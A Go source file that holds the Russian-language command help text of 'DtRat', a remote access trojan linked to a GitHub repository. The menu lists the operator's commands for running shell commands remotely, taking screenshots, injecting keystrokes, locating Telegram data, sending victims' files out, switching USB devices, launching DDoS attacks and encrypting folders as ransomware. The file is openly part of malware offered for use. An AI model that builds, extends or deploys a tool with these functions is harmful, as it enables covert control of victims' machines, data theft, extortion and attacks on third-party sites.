package rat

var helpText = `
Полная документация на https://github.com/deuterium34/DtRat

[W] - Доступно только в Windows
Справка по доступным командам:
/start            - Запускает первичную инициализацию (требуется один раз)
/cmd              - Выполняет команду в терминале и возвращает результат
/help             - Показывает эту справку
/kill             - Завершает работу 
/screenshot       - Скриншот основного экрана
/monitor [on|off] - [W] Управляет состоянием монитора
/keyboard [paste|press|hotkey] STRING - [W] Симулирует ввод с клавиатуры
	paste  - Вставляет текст
	press  - Одиночное нажатие клавиши
	hotkey - Нажимает сочитание клавишь (+ в качестве разделителя)

/browser STRING            - Открывает URL в браузере
/findtg                    - Выполняет поиск папки Telegram
/usb [list|enable|disable] - [W] Управление USB устройствами
	list         - Показывает список USB устройств
	enable [ID]  - Включает USB устройство по ID из списка
	disable [ID] - Отключает USB устройство по ID из списка

/volume INT          - Устанавливает громкость системы на заданное значение от 0 до 100
/info                - Отправляет информацию о системе
/sendfile PATH       - Отправляет файл по указанному пути
/ddos [DURATION] URL - DDoS атака на URL в течение DURATION секунд
/show PATH           - [W] Показывает изображение или видео на экране из указанного пути
/ransom [encrypt|decrypt] PATH KEY [EXCLUDES] - Шифровальщик
	encrypt|decrypt - Режим работы (шифрование или расшифровка)
	PATH            - Целевая папка для обработки (по умолчанию папка с исполняемым файлом)
	KEY             - Ключ для шифрования/расшифровки
	EXCLUDES        - Список папок для исключения из обработки
`
